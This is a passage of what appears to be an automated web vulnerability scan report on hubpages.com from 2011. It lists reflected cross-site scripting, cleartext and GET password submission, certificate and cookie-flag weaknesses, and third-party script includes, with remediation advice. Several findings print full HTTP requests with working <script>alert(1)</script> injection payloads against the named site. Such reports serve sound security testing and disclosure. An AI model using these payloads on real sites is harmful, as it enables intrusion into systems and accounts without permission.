Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...

1.29. https://hubpages.com/signin/reset/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...

1.30. https://hubpages.com/signin/reset/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...

1.31. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...

2. Cleartext submission of password previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://hubpages.com/user/new/

The form contains the following password fields:

password
password2

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /user/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:27 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<div id="create">
       <form id="signn" name="signn" method="get" action="">
       <div style="clear:left">
...[SNIP]...
</label>
           <input autocomplete="off" type="password" tabindex="3" size="25" name="password" id="password" value="" onfocus="_helpOn('help__password')" onblur="_helpOff('help__password')"/>

           <div id="help__password" class="help_wrap">
...[SNIP]...
</label>
           <input autocomplete="off" type="password" tabindex="4" size="25" name="password2" id="password2" value="" onfocus="_helpOn('help__password2')" onblur="_helpOff('help__password2')"/>
           <div id="help__password2" class="help_wrap">
...[SNIP]...

3. SSL certificate previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://hubpages.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	hubpages.com
Issued by:	Network Solutions Certificate Authority
Valid from:	Mon Dec 20 18:00:00 CST 2010
Valid to:	Fri Dec 21 17:59:59 CST 2012

Certificate chain #1

Issued to:	UTN-USERFirst-Hardware
Issued by:	AddTrust External CA Root
Valid from:	Tue Jun 07 03:09:10 CDT 2005
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:	Network Solutions Certificate Authority
Issued by:	UTN-USERFirst-Hardware
Valid from:	Sun Apr 09 19:00:00 CDT 2006
Valid to:	Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:	UTN-USERFirst-Hardware
Issued by:	UTN-USERFirst-Hardware
Valid from:	Fri Jul 09 13:10:42 CDT 1999
Valid to:	Tue Jul 09 13:19:22 CDT 2019

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

4. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://hubpages.com/user/new/

The form contains the following password fields:

password
password2

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

Response

5. SSL cookie without secure flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

6. Cross-domain Referer leakage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The page was loaded from a URL containing a query string:

https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.

The response contains the following links to other domains:

https://edge.quantserve.com/quant.js
https://pixel.quantserve.com/pixel/p-40hb1Sup4Jk_U.gif
https://secure-us.imrworldwide.com/cgi-bin/m?ci=us-504056h&cg=0&cc=1&ts=noscript

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:42 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="https://pixel.quantserve.com/pixel/p-40hb1Sup4Jk_U.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-504056h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

7. Cross-domain script include previous next
There are 8 instances of this issue:

http://hubpages.com/
http://hubpages.com/about/advertise
http://hubpages.com/hubs/hot/
http://hubpages.com/topics/
http://hubpages.com/tour/affiliate
http://hubpages.com/user/new/
https://hubpages.com/signin/
https://hubpages.com/signin/reset/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

7.1. http://hubpages.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:24 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

7.2. http://hubpages.com/about/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /about/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:20 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

7.3. http://hubpages.com/hubs/hot/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/hubs/hot/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://yieldbuild.com/x_ad.js

Request

GET /hubs/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:24 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://yieldbuild.com/x_ad.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yieldbuild.com/x_ad.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yieldbuild.com/x_ad.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

7.4. http://hubpages.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/topics/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /topics/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:23 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

7.5. http://hubpages.com/tour/affiliate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /tour/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:21 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

7.6. http://hubpages.com/user/new/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LemUQQAAAAAAC6mNwmiXb8ZwmUU0R9Z5v_yZ5xl
http://edge.quantserve.com/quant.js

Request

Response

7.7. https://hubpages.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The response dynamically includes the following script from another domain:

https://edge.quantserve.com/quant.js

Request

Response

7.8. https://hubpages.com/signin/reset/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The response dynamically includes the following script from another domain:

https://edge.quantserve.com/quant.js

Request

POST /signin/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.
Content-Length: 6

email=

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:15 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 6107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
</script>
<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

8. Cookie without HttpOnly flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

Response

9. Email addresses disclosed previous
There are 2 instances of this issue:

http://hubpages.com/about/advertise
https://hubpages.com/s/js18621.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

9.1. http://hubpages.com/about/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The following email address was disclosed in the response:

advertise@hubpages.com

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:20 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
